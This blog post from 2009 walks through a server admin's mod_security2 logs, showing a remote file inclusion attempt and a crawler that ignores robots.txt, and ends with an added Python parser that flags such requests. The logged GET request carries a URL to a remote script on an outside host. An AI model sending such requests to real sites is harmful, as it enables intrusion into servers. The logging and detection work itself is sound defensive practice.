Oct 14, 2009

Persisting Korean spider, hack attempts

After yesterday's incident with a stupid bot, I thought I might give you more insight on what happens on the Net. Here are some interesting examples from the mod_security2 logs on my server.



Hacking attempt

Here is a hacking attempt coming from AGAVA, a Russian Internet provider:
--8920bc48-A--
[13/Oct/2009:21:03:12 +0300] 3Auc3X8AAAIAACKqdxMAAACG 89.108.122.160 58387 213.21.217.206 80
--8920bc48-B--
GET /%20%20/?subdir=http://ihent.ru/id1.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxx
User-Agent: Mozilla/5.0

Have a look at the referenced script. This one just outputs something, but often there are very sophisticated scripts. I saw one which tried to fill the hard disk with various random garbage until space was exhausted. This would make ssh logins and quick recovery impossible.
There were many requests like this one, all caught.

Persisting spider

Some Korean people seem not to understand that they are not welcome. robots.txt says they are not allowed to index the site. They still do it:
--cde7352d-A--
[13/Oct/2009:21:01:16 +0300] 1SbJMn8AAAIAACJ4T0kAAABF 61.247.222.82 50325 213.21.217.206 80
--cde7352d-B--
GET /xxx HTTP/1.1
Host: xxx
Accept-Language: ja,en;q=0.5
User-Agent: Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
Connection: close
Accept: */*

I banned one /20 subnet; now they came from a broader one. Well, I'll continue banning them. What else can I do if I do not want them here?
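
The two kinds of entry shown above (a request carrying a remote URL in a parameter, and a crawler that robots.txt disallows) can be picked out of the audit log automatically. This is an added example, not part of the original post: the sample entries, addresses, remote host, function names and finding labels are constructed, and the /20 grouping simply mirrors the subnet size banned above.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in the serial audit-log layout above; IPs and hosts are placeholders.
SAMPLE = """\
--0a1b2c3d-A--
[13/Oct/2009:21:03:12 +0300] AAAAAAAAAAAAAAAAAAAAAAAA 192.0.2.160 58387 203.0.113.6 80
--0a1b2c3d-B--
GET /%20%20/?subdir=http://remote.example/id1.txt? HTTP/1.1
User-Agent: Mozilla/5.0
--0a1b2c3d-Z--
--4e5f6a7b-A--
[13/Oct/2009:21:01:16 +0300] BBBBBBBBBBBBBBBBBBBBBBBB 198.51.100.82 50325 203.0.113.6 80
--4e5f6a7b-B--
GET /xxx HTTP/1.1
User-Agent: Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
--4e5f6a7b-Z--
"""

BOUNDARY = re.compile(r"^--([0-9a-f]{8})-([A-Z])--$")
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
BLOCKED_AGENTS = ("Yeti/",)  # assumption: crawlers that robots.txt disallows

def parse_audit_log(text):
    """Split a serial audit log into one {section letter: [lines]} dict per transaction."""
    entries, section = [], None
    for line in text.splitlines():
        m = BOUNDARY.match(line)
        if m and m.group(2) == "A":
            entries.append({})          # section A opens a new transaction
        if m:
            section = m.group(2)
        elif entries and section and line:
            entries[-1].setdefault(section, []).append(line)
    return entries

def classify(entry):
    """Return (source /20 network, findings) for one parsed transaction."""
    src_ip = entry["A"][0].split()[3]   # [date tz] unique_id src_ip src_port dst_ip dst_port
    net = str(ipaddress.ip_network(f"{src_ip}/20", strict=False))
    request, *header_lines = entry.get("B") or [""]
    parts = request.split()
    query = urlsplit(parts[1]).query if len(parts) > 1 else ""
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well
    findings = [f"remote-url-param:{k}" for k, v in parse_qsl(query) if REMOTE_URL.match(v)]
    headers = {k.lower(): v.strip() for k, _, v in (h.partition(":") for h in header_lines)}
    if headers.get("user-agent", "").startswith(BLOCKED_AGENTS):
        findings.append("blocked-crawler")
    return net, findings
```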
